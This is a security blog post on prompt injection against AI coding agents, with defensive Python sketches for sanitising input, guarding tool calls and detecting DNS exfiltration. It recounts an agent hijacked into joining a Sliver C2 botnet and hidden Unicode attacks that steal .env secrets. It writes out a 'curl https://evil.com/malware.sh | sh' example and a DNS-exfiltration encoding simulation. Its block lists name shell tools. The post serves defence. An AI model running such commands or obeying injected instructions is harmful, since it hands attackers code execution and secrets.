
Prompt injection can hijack AI coding agents, enabling remote code execution and data exfiltration. Learn practical safeguards for CTOs and engineers.
Published by Brav
TL;DR
- Prompt injection lets an attacker trick an AI coding agent into running malicious commands on your infrastructure.
- A single Unicode-hidden payload can make an agent join a Sliver C2 botnet or exfiltrate secrets via DNS.
- Agents that click links or render images can leak URLs back to an attacker.
- The fix is to treat every LLM output as untrusted code and sandbox it with strict controls.
- Human-in-the-loop oversight, downstream security checks, and a tight API whitelist are non-negotiable.
Why This Matters
When I was building an internal automation stack in 2022, I never imagined that the very tools designed to boost developer productivity could become the vector for a remote code execution chain. The reality is that prompt injection attacks on coding agents can elevate a low-privilege LLM into a full-blown attacker foothold, as a demonstration against Claude’s Computer Use showed: the agent downloaded malware and joined a Sliver C2 botnet [Claude’s Computer Use – malware & botnet]. A single injected instruction turned a harmless helper into a command-and-control client. For a CTO, the lesson is that any unchecked agent can turn a protected network into an attacker’s playground.
Core Concepts
Prompt Injection as Social Engineering
Prompt injection is not just a syntactic glitch; it is the new form of social engineering where an attacker manipulates the LLM’s instruction set. A well-crafted prompt can make the agent believe it is executing a legitimate task while silently dropping a shell, modifying a config file, or launching a malicious payload [Prompt injection is a social engineering problem].
The Confused Deputy Problem
Agents are designed to trust the instructions they receive. When an attacker injects a command that appears benign, the agent obeys, acting as a “confused deputy” that inadvertently hands over power to the attacker. This is similar to legacy software that performs privileged actions on behalf of a malicious user when they misrepresent their identity [Confused deputy problem].
Hidden Unicode Injection
Unicode can be abused to hide instructions inside seemingly innocuous text. A single zero-width space or non-printing character can change the meaning of a prompt or code block. Attackers use this to embed shell commands in comments or to trick the agent into executing find-exec chains that can read .env files and exfiltrate secrets over DNS [Hidden Unicode injection embedded instructions in code].
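To make this concrete, here is a minimal Python sketch of detecting and stripping invisible characters before a prompt reaches the model. The explicit character set is illustrative, not exhaustive; the Unicode "format character" (Cf) category check catches the broader class:

```python
import unicodedata

# Invisible characters commonly abused for hidden-instruction injection.
# The explicit set is illustrative; the category check below also catches
# the broader "format character" (Cf) class.
ZERO_WIDTH = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff"}

def find_hidden_chars(text: str) -> list[tuple[int, str]]:
    """Return (index, character name) for every invisible character found."""
    return [
        (i, unicodedata.name(ch, hex(ord(ch))))
        for i, ch in enumerate(text)
        if ch in ZERO_WIDTH or unicodedata.category(ch) == "Cf"
    ]

def strip_hidden_chars(text: str) -> str:
    """Drop invisible format characters before text reaches the model."""
    return "".join(
        ch for ch in text
        if ch not in ZERO_WIDTH and unicodedata.category(ch) != "Cf"
    )

# The string below carries a zero-width space that most editors won't show:
payload = "print('hello')\u200b# looks like a normal comment"
print(find_hidden_chars(payload))  # flags the character at index 14
```

Run the sanitizer on every prompt and every file an agent is about to read; flagged characters are almost never legitimate in source code.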
Automatic Tool Invocation Bypass
Many agents offer a “call-tool” API that lets them run external commands. The safety layer often checks only the prompt text, not the resulting tool invocation. If an attacker injects a prompt that forces the agent to call `bash -c "curl https://evil.com/malware.sh | sh"`, the agent will happily execute it, bypassing the safety guardrails [Agents that click links trigger malicious downloads].
Remote Code Execution and Data Exfiltration
The combination of prompt injection, tool invocation, and hidden Unicode allows an attacker to achieve RCE on the host machine. Once a shell is granted, an agent can use DNS tunneling (ping, dig, nslookup) to send secrets out, or open a local web server and expose file systems [Prompt injection exfiltrates data via DNS requests].
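To see what defenders are up against, here is a hedged sketch of the encoding side: how a secret could be chunked into DNS-safe query names. This is a simulation only; `evil.example.com` is a placeholder and nothing is sent over the network:

```python
import base64

def encode_for_dns(secret: bytes, domain: str, label_len: int = 40) -> list[str]:
    """Chunk a secret into DNS-safe query names (simulation only -- no
    queries are sent). Base32 keeps the payload inside the DNS hostname
    alphabet, and labels stay under the 63-byte limit."""
    encoded = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [encoded[i:i + label_len] for i in range(0, len(encoded), label_len)]
    return [f"{chunk}.{domain}" for chunk in chunks]

# Each "query" below is one DNS lookup an attacker-controlled nameserver
# would log and reassemble on the other end.
for query in encode_for_dns(b"AWS_SECRET_ACCESS_KEY=abc123", "evil.example.com"):
    print(query)
```

Because every resolver on the path forwards these lookups toward the attacker’s authoritative nameserver, this channel works even when all other egress is blocked, which is why the DNS monitoring step below matters.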
How to Apply
1. Inventory and Categorize Agents
I start by listing every coding agent, computer-use agent, or tool-invoking bot in the organization. For each one, note its capabilities, the level of sandboxing it offers, and whether it can modify local files. Agents like Claude’s Computer Use, Google Antigravity, and GitHub Copilot fall into different risk buckets.
| Agent | Typical Safety Feature | Common Attack Vector | Limitation |
|---|---|---|---|
| Claude’s Computer Use | Tool invocation with user context | Prompt injection to download malware (Sliver C2) | No sandbox, can modify local config |
| Google Antigravity | Code generation only | Hidden Unicode to embed malicious code | No tool invocation safety |
| GitHub Copilot | In-editor suggestions | Prompt injection via comments to alter code | No execution context |
This table shows that agents with tool-invoking capabilities are the highest priority for hardening.
2. Treat LLM Output as Untrusted Code
Just like any third-party script, never run an LLM’s code block directly. Enforce a sandbox that:
- Limits file system access to a read-only mount for the host.
- Runs commands with the lowest privileged user account.
- Logs every tool invocation with a signature hash.
A simple wrapper can intercept invoke_tool calls, inspect the payload, and reject anything that touches /etc/ or contains suspicious shell metacharacters.
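A minimal sketch of such a wrapper, assuming a hypothetical `run_tool(tool, payload)` callable as the underlying executor; the deny rules are illustrative, and a real deployment should default-deny instead:

```python
import hashlib
import logging
import re

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("tool-guard")

# Illustrative deny rules -- real deployments should default-deny instead.
BLOCKED_PATHS = ("/etc/", "/root/", "~/.ssh")
SHELL_META = re.compile(r"[;&|`$><]")

def guarded_invoke(tool: str, payload: str, run_tool):
    """Inspect and audit-log a tool call before passing it to run_tool,
    a hypothetical callable that performs the actual invocation."""
    if any(p in payload for p in BLOCKED_PATHS):
        raise PermissionError(f"payload touches a blocked path: {payload!r}")
    if SHELL_META.search(payload):
        raise PermissionError(f"payload contains shell metacharacters: {payload!r}")
    # The signature hash ties each audit-log entry to the exact invocation.
    digest = hashlib.sha256(f"{tool}:{payload}".encode()).hexdigest()[:16]
    log.info("invoke %s sig=%s", tool, digest)
    return run_tool(tool, payload)
```

With this in place, `guarded_invoke("bash", "cat /etc/passwd", ...)` raises before the command ever runs, and every invocation that does run leaves a hashed audit trail.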
3. Whitelist APIs and Commands
Create an explicit whitelist of commands the agent may execute. Anything outside that set must be flagged. For example, allow only `python -m venv`, `pip install`, or `git clone`, but block `bash -c`, `sh`, and `wget` unless explicitly approved. This mitigates the “automatic tool invocation bypass” attack surface.
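One way to sketch that allow-list in Python, using `shlex` to parse commands; the specific allowed and blocked sets below are illustrative policy, not a recommendation:

```python
import shlex

# Hypothetical policy matching the examples above: allow-listed
# (program, first-argument) prefixes, plus an explicit block set.
ALLOWED_PREFIXES = {
    ("python", "-m"),    # e.g. python -m venv
    ("pip", "install"),
    ("git", "clone"),
}
BLOCKED_PROGRAMS = {"bash", "sh", "wget", "curl"}

def is_allowed(command: str) -> bool:
    """Default-deny: the command must match an allowed prefix, and no
    argument may smuggle in a blocked program."""
    try:
        argv = shlex.split(command)
    except ValueError:
        return False  # unparseable input is rejected outright
    if len(argv) < 2 or argv[0] in BLOCKED_PROGRAMS:
        return False
    if any(arg in BLOCKED_PROGRAMS for arg in argv[1:]):
        return False
    return tuple(argv[:2]) in ALLOWED_PREFIXES
```

Treat the allow-list as a first filter, not a sandbox: even `git clone` can be abused (e.g. via repository hooks), so pair it with the execution controls from the previous step.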
4. Enable Human-in-the-Loop for Sensitive Actions
When an agent proposes a command that touches secrets or system configuration, surface it to a human operator before execution. A small UI in the CI pipeline or chat interface can display the full command and let an engineer veto it. This layer prevents silent privilege escalation.
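A minimal sketch of that gate, where `approver` stands in for whatever UI or chat prompt your pipeline uses; both the marker list and the callables are hypothetical:

```python
# Hypothetical policy: anything touching secrets or system configuration
# gets routed to a human before it runs.
SENSITIVE_MARKERS = (".env", "secrets", "/etc/", "chmod", "sudo")

def needs_approval(command: str) -> bool:
    """Flag commands that touch secrets or system configuration."""
    return any(marker in command for marker in SENSITIVE_MARKERS)

def execute_with_gate(command: str, approver, run):
    """Run benign commands directly; route sensitive ones through a human
    approver (any callable returning True/False -- a chat prompt, a CI
    approval step, etc.) before handing them to run()."""
    if needs_approval(command):
        print(f"[HITL] approval required for: {command}")
        if not approver(command):
            return "vetoed"
    return run(command)
```

The design choice that matters here is showing the operator the full, final command string, not the agent’s summary of it, since the summary is itself LLM output and can lie.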
5. Monitor DNS and Network Traffic
Install a lightweight DNS logger on the agent’s host. Any outbound DNS queries whose names look like encoded data (e.g., long base64- or hex-like labels) should trigger an alert. Combine this with a periodic port scan of the host; if the agent opens an unexpected web server to expose the local filesystem, the scan will catch it.
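The data-pattern check over logged query names can be sketched as a pair of regex heuristics; the thresholds below are illustrative and will need tuning against your real traffic to keep false positives down:

```python
import re

# Heuristics for data-bearing query names: long labels that look like
# base64/base32 or hex blobs. Thresholds are illustrative; long but
# legitimate CDN hostnames will need tuning around.
OPAQUE_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{20,63}$")
HEX_LABEL = re.compile(r"^[0-9a-fA-F]{16,63}$")

def looks_like_exfil(qname: str) -> bool:
    """Flag DNS query names with at least one long opaque label and the
    subdomain depth typical of tunneling (chunk.controller.domain.tld)."""
    labels = qname.rstrip(".").split(".")
    opaque = sum(
        1 for label in labels
        if OPAQUE_LABEL.match(label) or HEX_LABEL.match(label)
    )
    return opaque >= 1 and len(labels) >= 3
```

Feed every logged query through this filter and alert on matches; a burst of flagged lookups to one domain is the classic tunneling signature.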
6. Patch Rapidly and Automate Updates
The vendors that provide these agents often release patches within weeks once a vulnerability is disclosed. Automate your CI pipeline to pull the latest agent version and run a static analysis against known unsafe patterns before deployment. A nightly script can scan the agent code for suspicious constructs and push a “security flag” if any are found.
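A nightly scan like that might look like the following sketch; the pattern set is a small illustrative sample of “suspicious constructs,” not a complete ruleset:

```python
import re
from pathlib import Path

# Illustrative sample of "suspicious constructs" -- extend for real use.
UNSAFE_PATTERNS = {
    "shell pipe to interpreter": re.compile(r"curl[^\n]*\|\s*(?:ba)?sh"),
    "dynamic eval": re.compile(r"\beval\s*\("),
    "zero-width character": re.compile("[\u200b-\u200d\u2060\ufeff]"),
}

def scan_file(path: Path) -> list[str]:
    """Return the names of every unsafe pattern found in one source file."""
    text = path.read_text(errors="replace")
    return [name for name, pat in UNSAFE_PATTERNS.items() if pat.search(text)]

def scan_tree(root: str) -> dict[str, list[str]]:
    """Scan all Python files under root; a non-empty result is the
    "security flag" that should fail the nightly CI job."""
    return {
        str(p): hits
        for p in Path(root).rglob("*.py")
        if (hits := scan_file(p))
    }
```

Wire `scan_tree` into the nightly job so that any findings fail the build, and extend the glob beyond `*.py` if your agents emit other languages.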
Pitfalls & Edge Cases
- Vendor patch lag: Even if vendors fix vulnerabilities quickly, your internal orchestration may still be using an outdated version. Continuous integration must enforce the latest runtime.
- Multi-agent ecosystems: In environments where multiple agents collaborate, a single compromised agent can spread malware to others. Design an inter-agent trust model that isolates untrusted agents.
- Hidden Unicode detection: Most text editors strip or warn about zero-width characters, but LLM prompts may bypass this. Integrate a Unicode sanitizer that strips non-printing characters before feeding prompts to the model.
- Indirect payloads: Attackers can embed malicious code in a file that the agent later reads (e.g., a code snippet inside a requirements.txt). Validate all external files before feeding them to the agent.
Quick FAQ
Q: How can organizations enforce human-in-the-loop controls in coding agents at scale?
A: Build a lightweight UI that surfaces any command with a privilege-elevating flag to a gatekeeper queue. Use a role-based access system so only senior engineers can approve or reject.
Q: What are the best practices for sandboxing AI agents to prevent remote code execution?
A: Use OS-level containers (Docker, Kata Containers) with read-only mounts, run as a non-privileged user, and enforce an allow-list for system calls.
Q: How can vendors detect and mitigate hidden Unicode injection attacks?
A: Run a pre-processing step that normalizes the prompt, strips non-printing characters, and flags any suspicious Unicode ranges. Vendors can add this to the LLM input pipeline.
Q: What level of security controls should be applied downstream from LLM outputs?
A: All generated code should be subjected to the same static analysis pipeline as internal code: linting, unit tests, and a security scanner (e.g., Bandit for Python).
Q: How can we handle prompt injection when third-party data is involved?
A: Treat any third-party content as untrusted. Run the data through a sanitization layer before including it in prompts, and avoid direct concatenation of external JSON or code.
Q: Are there standardized frameworks for evaluating AI agent security across vendors?
A: Standardization is still emerging rather than settled. The Cloud Security Alliance and OWASP (whose Top 10 for LLM Applications lists prompt injection as the top risk) both publish checklists covering safety controls, sandboxing, and auditability; ask vendors which of these frameworks their controls map to.
Conclusion
Prompt injection in AI agents is not a theoretical risk—it has already manifested in real-world incidents like Claude’s Computer Use being hijacked into joining a Sliver C2 botnet. The path from harmless helper to full-blown RCE is short: a single prompt, a hidden Unicode character, and an unguarded tool invocation. By treating every LLM output as untrusted, sandboxing the execution environment, enforcing human oversight, and keeping the agent stack up to date, you can stop an injected prompt before it becomes an executed command. As a CTO or security lead, make this a top-line priority and harden AI agents the way you would any other critical infrastructure.
Glossary
- Prompt Injection – Crafting inputs that manipulate an LLM into performing unintended actions.
- Confused Deputy – A system that follows a malicious request because it misinterprets the caller’s authority.
- Hidden Unicode Injection – Embedding non-printing characters to alter code logic or bypass filters.
- Tool Invocation – The capability of an agent to call external commands or APIs.
- Sandbox – An isolated environment that restricts file system, network, and privilege access.
- Human-in-the-Loop (HITL) – A process where a human verifies or approves actions before they are executed.
- DNS Exfiltration – Sending data out of a network by encoding it into DNS queries.
- Sliver C2 – A lightweight command-and-control framework used by attackers.
- YOLO Mode – An agent configuration that removes safety checks to speed execution.


